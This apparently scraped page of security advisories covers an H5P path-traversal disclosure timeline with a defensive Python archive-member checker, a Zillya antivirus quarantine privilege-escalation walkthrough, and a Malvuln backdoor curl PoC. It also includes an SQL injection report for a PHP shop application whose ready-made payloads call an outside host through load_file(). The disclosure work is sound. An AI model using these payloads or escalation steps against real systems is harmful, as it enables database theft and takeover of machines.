/><br /><br />[-] Solution:<br /><br />No official solution is currently available.<br /><br /><br />[-] Disclosure Timeline:<br /><br />[22/11/2021] - Vendor notified<br />[28/02/2022] - Vendor proposed a possible patch<br />[28/02/2022] - Vendor notified about the ineffective patch, provided a <br />fix suggestion<br />[01/03/2022] - Vendor fixed the previous patch<br />[30/03/2022] - Asked for an update about the public disclosure and release <br />of a patch, no response<br />[22/11/2022] - After one year still no official solution available<br />[03/12/2022] - Public disclosure<br /><br /><br />[-] CVE Reference:<br /><br />The Common Vulnerabilities and Exposures project (cve.mitre.org)<br />has not assigned a CVE identifier for this vulnerability.<br /><br /><br />[-] Credits:<br /><br />Vulnerability discovered by Egidio Romano.<br /><br /><br />[-] Other References:<br /><br />https://security.drupal.org/node/175968<br /><br /><br />[-] Original Advisory:<br /><br />http://karmainsecurity.com/KIS-2022-06<br /><br /></code></pre>
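The py7zr report earlier on this page and the H5P advisory above are the same bug class: the extractor trusts member names (and, for 7z, symlink targets) instead of checking where they land. The following added checker is mine, not py7zr's or H5P's code. It normalises a member name the way both a POSIX and a Windows extractor would see it, rejects anything that escapes the destination, and, using a transcription of H5P's regex, shows which member names that check skips and which it lets through. Member names and link targets in `SAMPLE_MEMBERS` are constructed from the two reports.

```python
import posixpath
import re
from typing import List, Optional, Tuple

# H5P's skip rule, transcribed from the advisory's PHP preg_match.
H5P_SKIP_RE = re.compile(r"(^[\._]|/[\._])")
_DRIVE_RE = re.compile(r"^[A-Za-z]:")


def h5p_regex_skips(name: str) -> bool:
    """True when H5PValidator::isValidPackage() would skip this member."""
    return H5P_SKIP_RE.search(name) is not None


def normalise_member(name: str) -> str:
    """Canonical form for checks: backslashes become '/', because a Windows
    extractor treats both as separators, and '.'/'..' segments are collapsed
    (posixpath.normpath keeps any leading '..' that climbs above the root)."""
    return posixpath.normpath(name.replace("\\", "/"))


def _climbs_out(path: str) -> bool:
    return path == ".." or path.startswith("../")


def escapes_destination(name: str, link_target: Optional[str] = None) -> bool:
    """Return True if writing `name` (or the symlink `name` -> `link_target`)
    could touch anything outside the extraction directory.

    Rejected: absolute paths, drive letters (C:...), and any '..' that climbs
    above the destination.  A symlink target is resolved relative to the
    directory containing the link, which is how the extracted link behaves.
    """
    norm = normalise_member(name)
    if norm.startswith("/") or _DRIVE_RE.match(norm) or _climbs_out(norm):
        return True
    if link_target is not None:
        target = normalise_member(link_target)
        if target.startswith("/") or _DRIVE_RE.match(target):
            return True
        resolved = posixpath.normpath(posixpath.join(posixpath.dirname(norm), target))
        if _climbs_out(resolved):
            return True
    return False


def unsafe_members(members: List[Tuple[str, Optional[str]]]) -> List[str]:
    """Filter a (name, link_target) listing down to the members to refuse."""
    return [name for name, target in members if escapes_destination(name, target)]


# Constructed listing: the two py7zr payloads, the H5P Windows-style payload,
# and two benign entries (a plain file and a symlink that stays inside).
SAMPLE_MEMBERS = [
    ("../target/write", None),               # arbitrary write via traversal name
    ("link", "../target/read"),              # arbitrary read via symlink
    ("content\\..\\..\\..\\evil.php", None),  # no "/." so H5P's regex passes it
    ("content/index.html", None),            # fine
    ("docs/link", "../content/index.html"),  # link resolving inside the tree
]


if __name__ == "__main__":
    for name, target in SAMPLE_MEMBERS:
        print(f"{name!r:40} escapes={escapes_destination(name, target)} "
              f"h5p_skips={h5p_regex_skips(name)}")
```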
<pre><code>## Title: ASMS - PHP (by: oretnom23 ) v1.0 SQLi<br />## Author: nu11secur1ty<br />## Date: 12.03.2022<br />## Vendor: https://github.com/oretnom23,<br />https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/download-code?nid=15312&title=Automotive+Shop+Management+System+in+PHP%2FOOP+Free+Source+Code<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/ASMS-1.0<br /><br />## Description:<br />The `id` parameter appears to be vulnerable to SQL injection attacks.<br />The attacker can dump all database information without any problems,<br />and then he can destroy this system, depending<br />on the scenario.<br /><br />## STATUS: Critically awful<br /><br />[+] Payload:<br /><br />```MySQL<br />---<br />Parameter: id (GET)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: id=7'+(select<br />load_file('\\\\q3ui0l0datyx3tg6cov4tj0tpkvdj69u0xoobez3.stupid.com\\aze'))+''<br />OR NOT 9828=9828 AND 'NWsG'='NWsG<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: id=7'+(select<br />load_file('\\\\q3ui0l0datyx3tg6cov4tj0tpkvdj69u0xoobez3.stupid.com\\aze'))+''<br />AND (SELECT 9682 FROM (SELECT(SLEEP(5)))Oifb) AND 'zARc'='zARc<br /><br /> Type: UNION query<br /> Title: MySQL UNION query (NULL) - 8 columns<br /> Payload: id=7'+(select<br />load_file('\\\\q3ui0l0datyx3tg6cov4tj0tpkvdj69u0xoobez3.stupid.com\\aze'))+''<br />UNION ALL SELECT<br />NULL,CONCAT(0x7176626271,0x71504455436c68624e7878795354674d76627a4b4164756a4c46537651584b67584d744963504b5a,0x716a6b7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL#<br />---<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/ASMS-1.0)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/c5v75u)<br /><br />## Time spent<br />`00:27:00`<br /><br />## Time attack<br />`00:01:57`<br /><br /></code></pre>
<pre><code># Title: Zillya Total Security - Link Following Local Privilege Escalation (AVGater) Vulnerability<br /># Date: 02.12.2022<br /># Author: M. Akil Gündoğan <br /># Contact: https://twitter.com/akilgundogan<br /># Vendor Homepage: https://zillya.com/<br /># Software Link: (https://download.zillya.com/ZTS3.exe) / (https://download.zillya.com/ZIS3.exe)<br /># Version: IS (3.0.2367.0) / TS (3.0.2368.0)<br /># Tested on: Windows 10 Professional x64<br /># PoC Video: https://youtu.be/vRCZR1kd89Q<br /><br />Vulnerability Description: <br />---------------------------------------<br />Zillya's processes run with SYSTEM privileges. A user with low privileges on the system can copy any file they want <br />to any location by using the quarantine module in Zillya. This is an example of the AVGater class of vulnerabilities that are often <br />found in antivirus programs. <br /><br />You can read the article about AVGater vulnerabilities here: <br />https://bogner.sh/2017/11/avgater-getting-local-admin-by-abusing-the-anti-virus-quarantine/<br /><br />The vulnerability affects both "Zillya Total Security" and "Zillya Internet Security" products.<br /><br />Step by step reproduce:<br />---------------------------------------<br />1 - The attacker creates a new folder and places a malicious file into it. It can be a DLL or any other file. <br /><br />2 - The attacker waits for "Zillya Total Security" or "Zillya Internet Security" to quarantine it.<br /><br />3 - The created folder is linked with the "Create Mount Point" tool from Google's symbolic link testing tools to a folder that <br />the current user does not have write permission to. <br /><br />You can find these tools here: https://github.com/googleprojectzero/symboliclink-testing-tools <br /><br />4 - The attacker restores the quarantined file. When checked, it is seen that the file has been moved to the unauthorized location. <br />This is evidence of the escalation vulnerability: an attacker with an unprivileged user account can write to directories that require <br />authorization. 
Using techniques such as DLL hijacking, the attacker can then gain SYSTEM privileges.<br /><br />Advisories:<br />---------------------------------------<br />Developers should not allow unprivileged users to restore from quarantine unless necessary. <br /><br />Also, it should be checked whether the target file is being copied back to its original location. Unless necessary, users <br />should not be able to interfere with processes running with SYSTEM privileges. All processes on the user's side should <br />be run with normal privileges.<br /><br />Disclosure Timeline:<br />---------------------------------------<br />13.11.2022 - Vulnerability reported via email, but no response was given and no fix was released.<br />02.12.2022 - Full disclosure.<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/8872c2ec49ff3382240762a029631684.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br />Backup media: infosec.exchange/@malvuln<br /><br />Threat: Backdoor.Win32.Delf.gj<br />Vulnerability: Information Disclosure<br />Description: The malware listens on TCP port 80. Third-party adversaries who can reach an infected system can pass "netscreen.jpg" as the User-agent: header in the HTTP request to download the victim machine's screen captures.<br />Family: Delf<br />Type: PE32<br />MD5: 8872c2ec49ff3382240762a029631684<br />Vuln ID: MVID-2022-0663<br />Disclosure: 12/01/2022<br /><br /><br />Exploit/PoC:<br />curl http://x.x.x.x -H "User-agent: netscreen.jpg" --output screendump.jpg<br /> % Total % Received % Xferd Average Speed Time Time Time Current<br /> Dload Upload Total Spent Left Speed<br />100 215k 100 215k 0 0 215k 0 0:00:01 --:--:-- 0:00:01 1976k<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. 
All content Copyright (c) Malvuln.com (TM).<br /></code></pre>